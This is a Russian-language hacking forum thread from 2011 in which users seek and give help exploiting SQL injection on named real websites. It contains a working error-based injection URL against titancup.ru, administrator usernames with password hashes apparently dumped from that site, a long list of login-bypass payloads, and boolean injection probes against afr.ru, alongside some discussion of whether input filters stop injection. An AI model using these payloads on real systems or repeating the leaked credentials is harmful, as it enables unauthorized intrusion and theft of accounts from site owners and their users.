HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #19021  
Старый 26.12.2011, 18:30
Boolean
Guest
Сообщений: n/a
Провел на форуме:
40748

Репутация: 78
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
хелп, чёт никак не могу разкрутить
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//titancup.ru/user/?id=11+union+select+1--+

[/COLOR][/COLOR
Код:
Code:
http://titancup.ru/user/?id=11+and%28select+1+from%28select+count%28*%29,concat%28%28select+user%28%29%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29--1
upd: Konqi опередил)
 
Ответить с цитированием

  #19022  
Старый 26.12.2011, 18:38
Lilo
Moderator - Level 7
Регистрация: 10.03.2009
Сообщений: 1,013
Провел на форуме:
6183433

Репутация: 1521


По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
хелп, чёт никак не могу разкрутить
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//titancup.ru/user/?id=11+union+select+1--+

[/COLOR][/COLOR
ts_manager_users

Daven:b7838c7f83d8197f3e46b5d88e3d5a6c

White:0d9198487f4ad5fb4407ee44b84df42c

demiurg:c16bb5217e34563e2eb9af2d9edabb6c

помойму админы

бле

опередили
 
Ответить с цитированием

  #19023  
Старый 27.12.2011, 15:44
JorryGo
Guest
Сообщений: n/a
Провел на форуме:
1293

Репутация: 0
По умолчанию

Приветствую.

В кое какой форме авторизации ввожу кавычку и мне выдаются следующие ошибки.

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 12

Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 87

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 88

Warning: Cannot modify header information - headers already sent by (output started at /home/enn/enelis/sys/clientsarea_authenticate.php:12) in /home/enn/enelis/sys/clientsarea_authenticate.php on line 100

Warning: Cannot modify header information - headers already sent by (output started at /home/enn/enelis/sys/clientsarea_authenticate.php:12) in /home/enn/enelis/sys/clientsarea_authenticate.php on line 101

Это является sql иньекцией? И можно что-то с этим сделать?
 
Ответить с цитированием

  #19024  
Старый 27.12.2011, 15:59
t3cHn0iD
Новичок
Регистрация: 06.04.2009
Сообщений: 2
Провел на форуме:
150479

Репутация: 2
По умолчанию

Цитата:
Сообщение от JorryGo  
JorryGo said:
Приветствую.
В кое какой форме авторизации ввожу кавычку и мне выдаются следующие ошибки.
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 12
Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 87
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 88
Warning: Cannot modify header information - headers already sent by (output started at /home/enn/enelis/sys/clientsarea_authenticate.php:12) in /home/enn/enelis/sys/clientsarea_authenticate.php on line 100
Warning: Cannot modify header information - headers already sent by (output started at /home/enn/enelis/sys/clientsarea_authenticate.php:12) in /home/enn/enelis/sys/clientsarea_authenticate.php on line 101
Это является sql иньекцией? И можно что-то с этим сделать?
Пробуй обойти авторизацию так:

admin' --

admin' #

admin'/*

' or ''='

' or 'x'='x

" or "x"="x

') or ('x'='x

0 or 1=1

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 1=1--

" or 1=1--

' or '1'='1'--

"' or 1 --'"

or 1=1--

or%201=1

or%201=1 --

' or 1=1 or ''='

" or 1=1 or ""="

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

'hi' or 'x'='x';

' or 1=1--

' or 1=1#

' or 1=1/*

') or '1'='1--

') or ('1'='1--

' or username like '%

' or uname like '%

' or userid like '%

' or uid like '%

' or user like '%

' or 1=1 or ''='

' or ''='

x' or 1=1 or 'x'='y
 
Ответить с цитированием

  #19025  
Старый 27.12.2011, 19:42
trololoman96
Guest
Сообщений: n/a
Провел на форуме:
29020

Репутация: 55
По умолчанию

Есть такой кусок кода

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]// Check IP From IP Logging Database

[/COLOR][COLOR="#0000BB"]$get_voted_aids[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_col[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT pollip_aid FROM[/COLOR][COLOR="#0000BB"]$wpdb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]pollsip[/COLOR][COLOR="#DD0000"]WHERE pollip_qid =[/COLOR][COLOR="#0000BB"]$poll_id[/COLOR][COLOR="#DD0000"]AND pollip_ip = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]get_ipaddress[/COLOR][COLOR="#007700"]().[/COLOR][COLOR="#DD0000"]"'[/COLOR][COLOR="#0000BB"]$log_expiry_sql[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);

[/COLOR][/COLOR
в функции get_ipaddress() есть возможность подставить свои данные вместо ip, однако вконце все это дело обрабатывается функцией esc_attr() (подробней тут http://wp-kama.ru/function/esc_attr), она преобразует знаки в html сущности: & " ', может есть все же какой вариант выйти из запроса и провести sql inj, или я опять в пролете ?
 
Ответить с цитированием

  #19026  
Старый 27.12.2011, 21:37
ne0k
Guest
Сообщений: n/a
Провел на форуме:
10960

Репутация: 0
По умолчанию

Уважаемые гуру,

Есть код, где _GET, _POST и _COOKIE "фильтруются" так:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]security[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]security[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]security[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"]);

[/
COLOR][/COLOR
Функция сукурити:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]security[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"])

{

if ([/COLOR][COLOR="#0000BB"]is_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"])) {

[/
COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]array_map[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'security'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]);

}else{

if(![/COLOR][COLOR="#0000BB"]get_magic_quotes_gpc[/COLOR][COLOR="#007700"]()) {

[/
COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]htmlspecialchars[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]ENT_QUOTES[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'UTF-8'[/COLOR][COLOR="#007700"]);

}else{

[/
COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]htmlspecialchars[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]stripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]ENT_QUOTES[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'UTF-8'[/COLOR][COLOR="#007700"]);

}

[/
COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"\\"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\\\\"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]);

}

return[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"];

}

[/
COLOR][/COLOR
htmlspecialchars() и stripslashes() не выход жэ, чтобы защититься от SQLi ? Можно ли эксплуатировать?

Еще интересна функция array_map(), кажется мне, пахнет код экзекушн, не ?
 
Ответить с цитированием

  #19027  
Старый 27.12.2011, 22:02
trololoman96
Guest
Сообщений: n/a
Провел на форуме:
29020

Репутация: 55
По умолчанию

Цитата:
Сообщение от None  
htmlspecialchars() и stripslashes() не выход жэ, чтобы защититься от SQLi ? Можно ли эксплуатировать?
Можно только если данные в запросе не будут браться в кавычки, т.е. что то типа такого

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$get[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM `test` WHERE `id`=[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];

[/COLOR][/COLOR
Потому что htmlspecialchars() будет избавляться от кавычек, из запроса в таком случае не выйдешь, а stripslashes() будет разбираться со слешем с помощью которого можно было бы провести фрагментированную SQL inj при подходящих условиях.

По поводу array_map(), то тут вроде как нет выполнения, калл бэк функция уже определена по умолчанию, сменить нельзя
 
Ответить с цитированием

  #19028  
Старый 27.12.2011, 23:20
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию

Sql-inj такого типа раскучиваются или они не поддаются?

_http://www.afr.ru/region/303'/ob/
 
Ответить с цитированием

  #19029  
Старый 28.12.2011, 12:19
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от er9j6@  
er9j6@ said:
Sql-inj такого типа раскучиваются или они не поддаются?
_http://www.afr.ru/region/303'/ob/
Скобки юзай:

http://www.afr.ru/region/(303)and(1)=(0) false

http://www.afr.ru/region/(303)and(1)=(1) true
 
Ответить с цитированием

  #19030  
Старый 28.12.2011, 13:58
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию

Цитата:
Сообщение от Ereee  
Ereee said:
Скобки юзай:
http://www.afr.ru/region/(303)and(1)=(0) false
http://www.afr.ru/region/(303)and(1)=(1) true
Это я тоже знаю.

и, дальше как?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 5 (пользователей: 0 , гостей: 5)
 


Быстрый переход




ANTICHAT.XYZ